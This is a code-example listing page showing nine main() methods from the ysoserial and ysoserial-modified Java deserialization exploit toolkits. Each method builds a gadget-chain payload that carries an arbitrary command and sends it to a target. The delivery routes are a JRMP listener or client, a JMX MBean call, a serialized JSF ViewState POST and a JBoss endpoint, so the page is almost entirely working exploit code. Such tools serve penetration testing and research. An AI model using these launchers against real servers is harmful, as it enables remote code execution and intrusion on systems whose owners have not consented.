Java Code Examples for ysoserial.payloads.ObjectPayload.Utils#makePayloadObject()

The following examples show how to use ysoserial.payloads.ObjectPayload.Utils#makePayloadObject() . These examples are extracted from open source projects. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example 1
Source Project: ysoserial-modified   File: JRMPListener.java    License: MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {

        if ( args.length < 4 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <terminal_type> <cmd_to_exec>");
            System.exit(-1);
            return;
        }
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]); 
        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], cmdHelper);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);
    }
 
Example 2
Source Project: ysoserial-modified   File: JRMPClient.java    License: MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {
    if ( args.length < 5 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <terminal_type> <cmd_to_exec>");
        System.exit(-1);
    }
    
    CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[3], args[4]);
    Object payloadObject = Utils.makePayloadObject(args[2], cmdHelper);
    String hostname = args[ 0 ];
    int port = Integer.parseInt(args[ 1 ]);
    try {
        System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
        makeDGCCall(hostname, port, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(args[2], payloadObject);
}
 
Example 3
Source Project: ysoserial   File: JMXInvokeMBean.java    License: MIT License 6 votes vote down vote up
public static void main(String[] args) throws Exception {

	if ( args.length < 4 ) {
		System.err.println(JMXInvokeMBean.class.getName() + " <host> <port> <payload_type> <payload_arg>");
		System.exit(-1);
	}
   	
	JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args[0] + ":" + args[1] + "/jmxrmi");
       
	JMXConnector jmxConnector = JMXConnectorFactory.connect(url);
	MBeanServerConnection mbeanServerConnection = jmxConnector.getMBeanServerConnection();

	// create the payload
	Object payloadObject = Utils.makePayloadObject(args[2], args[3]);   
	ObjectName mbeanName = new ObjectName("java.util.logging:type=Logging");

	mbeanServerConnection.invoke(mbeanName, "getLoggerLevel", new Object[]{payloadObject}, new String[]{String.class.getCanonicalName()});

	//close the connection
	jmxConnector.close();
   }
 
Example 4
Source Project: ysoserial   File: JRMPListener.java    License: MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
            System.exit(-1);
            return;
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);
    }
 
Example 5
Source Project: ysoserial   File: JRMPClient.java    License: MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {
    if ( args.length < 4 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <payload_arg>");
        System.exit(-1);
    }

    Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
    String hostname = args[ 0 ];
    int port = Integer.parseInt(args[ 1 ]);
    try {
        System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
        makeDGCCall(hostname, port, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(args[2], payloadObject);
}
 
Example 6
Source Project: ysoserial-modified   File: JSF.java    License: MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 4 ) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <terminal_type> <payload_arg>");
            System.exit(-1);
        }
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]);
        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], cmdHelper);

        try {
            URL u = new URL(args[ 0 ]);

            URLConnection c = u.openConnection();
            if ( ! ( c instanceof HttpURLConnection ) ) {
                throw new IllegalArgumentException("Not a HTTP url");
            }

            HttpURLConnection hc = (HttpURLConnection) c;
            hc.setDoOutput(true);
            hc.setRequestMethod("POST");
            hc.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            OutputStream os = hc.getOutputStream();

            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(payloadObject);
            oos.close();
            byte[] data = bos.toByteArray();
            String requestBody = "javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(data), "US-ASCII");
            os.write(requestBody.getBytes("US-ASCII"));
            os.close();

            System.err.println("Have response code " + hc.getResponseCode() + " " + hc.getResponseMessage());
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);

    }
 
Example 7
Source Project: ysoserial-modified   File: JBoss.java    License: MIT License 5 votes vote down vote up
public static void main ( String[] args ) {
    
    if ( args.length < 4 ) {
        System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <terminal_type> <cmd_to_execute>");
        System.exit(-1);
    }

    URI u = URI.create(args[ 0 ]);
    
    CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]); 

    final Object payloadObject = Utils.makePayloadObject(args[1], cmdHelper);
    
    String username = null;
    String password = null;
    if ( u.getUserInfo() != null ) {
        int sep = u.getUserInfo().indexOf(':');
        if ( sep >= 0 ) {
            username = u.getUserInfo().substring(0, sep);
            password = u.getUserInfo().substring(sep + 1);
        }
        else {
            System.err.println("Need <user>:<password>@");
            System.exit(-1);
        }
    }

    doRun(u, payloadObject, username, password);
    Utils.releasePayload(args[1], payloadObject);
}
 
Example 8
Source Project: ysoserial   File: JSF.java    License: MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <payload_arg>");
            System.exit(-1);
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            URL u = new URL(args[ 0 ]);

            URLConnection c = u.openConnection();
            if ( ! ( c instanceof HttpURLConnection ) ) {
                throw new IllegalArgumentException("Not a HTTP url");
            }

            HttpURLConnection hc = (HttpURLConnection) c;
            hc.setDoOutput(true);
            hc.setRequestMethod("POST");
            hc.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            OutputStream os = hc.getOutputStream();

            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(payloadObject);
            oos.close();
            byte[] data = bos.toByteArray();
            String requestBody = "javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(data), "US-ASCII");
            os.write(requestBody.getBytes("US-ASCII"));
            os.close();

            System.err.println("Have response code " + hc.getResponseCode() + " " + hc.getResponseMessage());
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);

    }
 
Example 9
Source Project: ysoserial   File: JBoss.java    License: MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <payload_arg>");
            System.exit(-1);
        }

        URI u = URI.create(args[ 0 ]);

        final Object payloadObject = Utils.makePayloadObject(args[1], args[2]);

        String username = null;
        String password = null;
        if ( u.getUserInfo() != null ) {
            int sep = u.getUserInfo().indexOf(':');
            if ( sep >= 0 ) {
                username = u.getUserInfo().substring(0, sep);
                password = u.getUserInfo().substring(sep + 1);
            }
            else {
                System.err.println("Need <user>:<password>@");
                System.exit(-1);
            }
        }

        doRun(u, payloadObject, username, password);
        Utils.releasePayload(args[1], payloadObject);
    }